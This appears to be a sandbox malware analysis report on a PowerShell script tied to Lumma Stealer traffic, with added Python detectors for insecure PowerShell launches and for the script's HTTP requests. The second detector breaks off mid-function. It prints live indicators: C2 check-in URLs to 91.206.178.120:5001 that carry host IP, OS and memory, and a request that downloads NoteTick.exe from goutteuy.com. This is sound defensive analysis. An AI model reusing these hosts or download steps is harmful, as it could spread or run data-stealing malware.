Windows Analysis Report
XkgoE6Yb52.ps1

Overview

General Information

Sample name: XkgoE6Yb52.ps1 (renamed because the original name is a hash value)
Original sample name: 042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635.ps1
Analysis ID: 1617748
MD5: ec5ea6c135974c85204bd38525329e5b
SHA1: 131f8dfd360bf7fffbbff91f264f0664c72b724c
SHA256: 042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635
Tags: 91-206-178-120, ps1, user-JAMESWT_MHT

Detection

Score: 76
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • notepad.exe (PID: 6364 cmdline: "C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\XkgoE6Yb52.ps1" MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3328, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", ProcessId: 6808, ProcessName: powershell.exe
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6808, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\analytics[1].js
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3328, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1", ProcessId: 6808, ProcessName: powershell.exe
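The Sigma rows above fire on the process-creation record of the script's launch: powershell.exe started with -ExecutionPolicy unrestricted and -file pointing at a script on the user's Desktop. The Python below is an added example written for this page, not Joe Sandbox code and not the Sigma rules themselves; it reproduces those two checks over constructed process-creation records. The first record is modelled on the rows above, the records for PIDs 7001 and 7002 are constructed controls (an abbreviated "-ep bypass" launch and a benign RemoteSigned launch), and the notepad.exe record is taken from the process tree. Switch matching follows powershell.exe's own rule that any prefix of -ExecutionPolicy of at least two characters (-ex, -exec, ...) and the alias -ep select that parameter, so a detector that only looks for the literal string "-ExecutionPolicy" misses the common short forms.

```python
import re

# Constructed process-creation records modelled on the Sigma rows above;
# PIDs 7001 and 7002 are added controls and do not come from the report.
SAMPLE_EVENTS = [
    {"ProcessId": 6808,
     "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'-noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\XkgoE6Yb52.ps1"'},
    {"ProcessId": 7001,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -nop -w hidden -ep bypass -c "Get-Date"'},
    {"ProcessId": 7002,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1'},
    {"ProcessId": 6364,
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r'"C:\Windows\System32\notepad.exe" "C:\Users\user\Desktop\XkgoE6Yb52.ps1"'},
]

INSECURE_POLICIES = {"unrestricted", "bypass"}
# Path fragments that an unprivileged user can write to (lower-cased match).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")
# Quoted paths stay one token; everything else splits on whitespace.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def _switch_name(tok):
    """'-ExecutionPolicy' -> 'executionpolicy'; '' when the token is not a switch."""
    return tok[1:].lower() if tok[:1] in ("-", "/") and len(tok) > 1 else ""


def _is_policy_switch(name):
    # powershell.exe accepts any prefix of -ExecutionPolicy of two or more
    # characters (-ex, -exec, ...) plus the separate alias -ep.
    return name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name))


def _is_file_switch(name):
    # -File may likewise be shortened down to -f.
    return len(name) >= 1 and "file".startswith(name)


def analyse(event):
    """Return a finding dict for a PowerShell launch, None for any other process."""
    toks = _TOKEN.findall(event["CommandLine"])
    if not toks or not toks[0].strip('"').lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    finding = {"ProcessId": event["ProcessId"], "policy": None, "script": None,
               # Image under SysWOW64 means the 32-bit host was used, as in the rows above.
               "wow64": "\\syswow64\\" in event["Image"].lower(),
               "flags": []}
    for i, tok in enumerate(toks[1:], start=1):
        name = _switch_name(tok)
        if i + 1 < len(toks):
            value = toks[i + 1].strip('"')
            if _is_policy_switch(name):
                finding["policy"] = value.lower()
            elif _is_file_switch(name):
                finding["script"] = value
    # Set-ExecutionPolicy inside a -Command body weakens the policy the same way.
    m = re.search(r"set-executionpolicy\s+(?:-executionpolicy\s+)?(\w+)",
                  event["CommandLine"], re.I)
    if m and finding["policy"] is None:
        finding["policy"] = m.group(1).lower()
    if finding["policy"] in INSECURE_POLICIES:
        finding["flags"].append("insecure-execution-policy")
    if finding["script"] and any(p in finding["script"].lower() for p in USER_WRITABLE):
        finding["flags"].append("script-in-user-writable-path")
    return finding


def scan(events):
    """Keep only PowerShell launches that raised at least one flag."""
    return [f for f in (analyse(e) for e in events) if f and f["flags"]]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["ProcessId"], f["policy"], f["script"], "wow64" if f["wow64"] else "", f["flags"])
```

The RemoteSigned launch from C:\Scripts is analysed but produces no flags, which is the behaviour wanted for a scheduled administrative script; in production the same logic runs over Sysmon event ID 1 or Security event 4688 with command-line auditing enabled.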
Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                                      Source IP        Source Port  Destination IP   Destination Port  Protocol
2025-02-18T08:29:03.230549+0100  1810000  2         Potentially Bad Traffic                        192.168.2.4      49731        104.26.13.205    80                TCP
2025-02-18T08:29:05.575867+0100  2860232  1         Malware Command and Control Activity Detected  192.168.2.4      49732        91.206.178.120   5001              TCP
2025-02-18T08:29:05.575867+0100  1810000  2         Potentially Bad Traffic                        192.168.2.4      49732        91.206.178.120   5001              TCP
2025-02-18T08:29:05.588539+0100  2860233  1         Malware Command and Control Activity Detected  91.206.178.120   5001         192.168.2.4      49732             TCP
2025-02-18T08:29:06.738323+0100  2021697  1         A Network Trojan was detected                  192.168.2.4      49733        185.211.7.193    443               TCP
2025-02-18T08:29:06.738323+0100  1810000  2         Potentially Bad Traffic                        192.168.2.4      49733        185.211.7.193    443               TCP
2025-02-18T08:29:08.328516+0100  2803274  2         Potentially Bad Traffic                        192.168.2.4      49737        91.206.178.120   5001              TCP
2025-02-18T08:29:08.328516+0100  1810000  2         Potentially Bad Traffic                        192.168.2.4      49737        91.206.178.120   5001              TCP


AV Detection

Source: http://91.206.178.120:5001 | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number= | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=$randomNumber | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip= | Avira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exe | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=33884$Mnl | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_end?random_number=33884 | Avira URL Cloud: Label: malware
Source: https://goutteuy.com/wp-content/p | Avira URL Cloud: Label: malware
Source: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m | Avira URL Cloud: Label: malware
Source: XkgoE6Yb52.ps1 | Virustotal: Detection: 16%
Source: XkgoE6Yb52.ps1 | ReversingLabs: Detection: 13%
Source: Submitted sample | Integrated Neural Analysis Model: Matched 96.7% probability
Source: unknown | HTTPS traffic detected: 185.211.7.193:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.4:49734 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2860232 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Checkin (GET) : 192.168.2.4:49732 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 2860233 - Severity 1 - ETPRO MALWARE Observed Lumma Stealer CnC Response (Script Start Confirmation) : 91.206.178.120:5001 -> 192.168.2.4:49732
Source: Network traffic | Suricata IDS: 2021697 - Severity 1 - ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious : 192.168.2.4:49733 -> 185.211.7.193:443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 5001
Source: unknown | Network traffic detected: HTTP traffic on port 5001 -> 49737
Source: global traffic | TCP traffic: 192.168.2.4:49732 -> 91.206.178.120:5001
Source: global traffic | TCP traffic: 192.168.2.4:65198 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 104.18.10.207
Source: Joe Sandbox View | IP Address: 104.18.10.207
Source: Joe Sandbox View | IP Address: 104.26.13.205
Source: Joe Sandbox View | IP Address: 104.26.13.205
Source: Joe Sandbox View | ASN Name: QUICKPACKETUS
Source: Joe Sandbox View | ASN Name: ARTNET2PL
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: api.ipify.org (2 queries)
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 104.26.13.205:80
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49737 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 91.206.178.120:5001
Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49733 -> 185.211.7.193:443
Source: global traffic | HTTP traffic detected:
    GET /wp-content/plugins/header-footer/images/NoteTick.exe HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: goutteuy.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /bootstrap/3.3.7/css/bootstrap.min.css HTTP/1.1
    Accept: */*
    Accept-Language: en-CH
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: maxcdn.bootstrapcdn.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: api.ipify.org
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&memory=4&random_number=33884 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 91.206.178.120:5001
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /script_end?random_number=33884 HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
    Host: 91.206.178.120:5001
Source: unknown | TCP traffic detected without corresponding DNS query: 91.206.178.120 (10 connections)
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2 (5 connections)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (3 connections)
Source: global traffic | DNS traffic detected: DNS query: api.ipify.org
Source: global traffic | DNS traffic detected: DNS query: goutteuy.com
Source: global traffic | DNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Connection: close
    content-type: text/html
    last-modified: Fri, 07 Jan 2022 09:51:35 GMT
    etag: "999-61d80d27-4ab5739bf7ac3281;;;"
    accept-ranges: bytes
    content-length: 2457
    date: Tue, 18 Feb 2025 07:29:06 GMT
    server: LiteSpeed
    platform: hostinger
    panel: hpanel
    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=
Source: notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1 | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=$randomNumber
Source: powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=33884
Source: powershell.exe, 00000000.00000002.1817520392.0000000005857000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_end?random_number=33884$Mnl
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1 | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=$ipAddress&os=$osVersion&memory=$memory&random_number=$ra
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://91.206.178.120:5001/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0&m
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2965988196.000000040A7F9000.00000004.00000010.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1 | String found in binary or memory: http://api.ipify.org
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org/
Source: powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.1821221013.0000000007A0D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: bootstrap.min[1].css.0.dr | String found in binary or memory: http://getbootstrap.com)
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1817520392.0000000005351000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBdq
Source: analytics[1].js.0.dr | String found in binary or memory: https://ampcid.google.com/v1/publisher:getClientId
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsgac:225:0
Source: powershell.exe, 00000000.00000002.1820791211.00000000078D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1825487978.000000000952C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsgac:225:0
Source: powershell.exe, 00000000.00000002.1823460527.00000000089B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family
Source: powershell.exe, 00000000.00000002.1816712031.0000000003231000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000000.00000002.1821019175.000000000796E000.00000004.00000020.00020000.00000000.sdmp, css[1].css.0.dr | String found in binary or memory: https://fonts.gstatic.com/l/font?kit=memSYaGs126MiZpBA-UvWbX2vVnXBbObj2OVZyOOSr4dVJWUgsjZ0B4gaVY&ske
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: bootstrap.min[1].css.0.dr | String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: powershell.exe, 00000000.00000002.1817520392.0000000005B55000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1817520392.00000000055E7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://goutteuy.com
Source: powershell.exe, 00000000.00000002.1817520392.0000000005708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://goutteuy.com/wp-content/p
Source: powershell.exe, 00000000.00000002.1817520392.00000000054A6000.00000004.00000800.00020000.00000000.sdmp, notepad.exe, 00000002.00000002.2966090116.000001CD37597000.00000004.00000020.00020000.00000000.sdmp, XkgoE6Yb52.ps1 | String found in binary or memory: https://goutteuy.com/wp-content/plugins/header-footer/images/NoteTick.exe
Source: powershell.exe, 00000000.00000002.1823460527.00000000089B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000000.00000002.1822987917.00000000088E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/
Source: powershell.exe, 00000000.00000002.1816712031.00000000031E7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css#
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssS
Source: powershell.exe, 00000000.00000002.1823052796.000000000896D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.cssl
Source: powershell.exe, 00000000.00000002.1822729964.0000000008880000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://maxcdn.bootstrapcdn.com/l
Source: powershell.exe, 00000000.00000002.1819665396.00000000063B7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: analytics[1].js.0.dr | String found in binary or memory: https://stats.g.doubleclick.net/j/collect
Source: analytics[1].js.0.dr | String found in binary or memory: https://tagassistant.google.com/
Source: powershell.exe, 00000000.00000002.1816712031.0000000003231000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/
Source: powershell.exe, 00000000.00000002.1816712031.0000000003231000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/:
Source: powershell.exe, 00000000.00000002.1823052796.0000000008911000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1817520392.0000000005602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1816712031.00000000031CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: powershell.exe, 00000000.00000002.1823460527.00000000089C2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js.
Source: powershell.exe, 00000000.00000002.1823052796.0000000008952000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsK
Source: powershell.exe, 00000000.00000002.1823052796.0000000008911000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsWC:
Source: powershell.exe, 00000000.00000002.1823052796.0000000008952000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.jsn
Source: analytics[1].js.0.dr | String found in binary or memory: https://www.google-analytics.com/debug/bootstrap?id=
Source: analytics[1].js.0.dr | String found in binary or memory: https://www.google-analytics.com/gtm/js?id=
Source: analytics[1].js.0.dr | String found in binary or memory: https://www.google.%/ads/ga-audiences
Source: analytics[1].js.0.dr | String found in binary or memory: https://www.google.com/ads/ga-audiences
Source: analytics[1].js.0.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=
Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown | Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734
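The requests listed in this section form a small, fixed protocol: an external-IP lookup against api.ipify.org, a GET /script_start check-in to 91.206.178.120:5001 carrying ip, os, memory and a random_number, a fetch of NoteTick.exe from a WordPress plugin path on goutteuy.com, and a GET /script_end that repeats the same random_number. The Python below is an added example written for this page, not Joe Sandbox or Suricata code; it scores each request on the traits visible above (PowerShell User-Agent, IP-literal Host, non-standard port, the check-in paths, an .exe under /wp-content/) and pairs script_start with script_end by random_number to rebuild each run. The request records are constructed from the requests shown above with shortened timestamps; the bootstrapcdn CSS fetch serves as a benign control. The two 443 requests are visible here only because the sandbox decrypts TLS, so on a real network the same logic needs a TLS-inspecting proxy or endpoint telemetry rather than a passive tap.

```python
from urllib.parse import urlsplit, parse_qs
import ipaddress

PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
IE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; "
         ".NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)")

# Constructed records modelled on the requests in this section (a proxy log,
# Zeek http.log or sandbox PCAP parser yields the same fields); timestamps shortened.
SAMPLE_REQUESTS = [
    {"ts": "08:29:03", "dst": "104.26.13.205", "port": 80, "host": "api.ipify.org",
     "uri": "/", "ua": PS_UA},
    {"ts": "08:29:05", "dst": "91.206.178.120", "port": 5001, "host": "91.206.178.120:5001",
     "uri": "/script_start?ip=8.46.123.189&os=Microsoft%20Windows%20NT%2010.0.19045.0"
            "&memory=4&random_number=33884", "ua": PS_UA},
    {"ts": "08:29:06", "dst": "185.211.7.193", "port": 443, "host": "goutteuy.com",
     "uri": "/wp-content/plugins/header-footer/images/NoteTick.exe", "ua": PS_UA},
    {"ts": "08:29:07", "dst": "104.18.10.207", "port": 443, "host": "maxcdn.bootstrapcdn.com",
     "uri": "/bootstrap/3.3.7/css/bootstrap.min.css", "ua": IE_UA},   # benign control
    {"ts": "08:29:08", "dst": "91.206.178.120", "port": 5001, "host": "91.206.178.120:5001",
     "uri": "/script_end?random_number=33884", "ua": PS_UA},
]

CHECKIN_PARAMS = {"ip", "os", "memory", "random_number"}
STRONG = {"checkin-start", "checkin-end", "exe-from-wordpress-path"}


def _is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(req):
    """Return the list of traits that make one request look like this script's traffic."""
    parts = urlsplit(req["uri"])
    path = parts.path.lower()
    params = set(parse_qs(parts.query))
    host = req["host"].rsplit(":", 1)[0].lower()
    reasons = []
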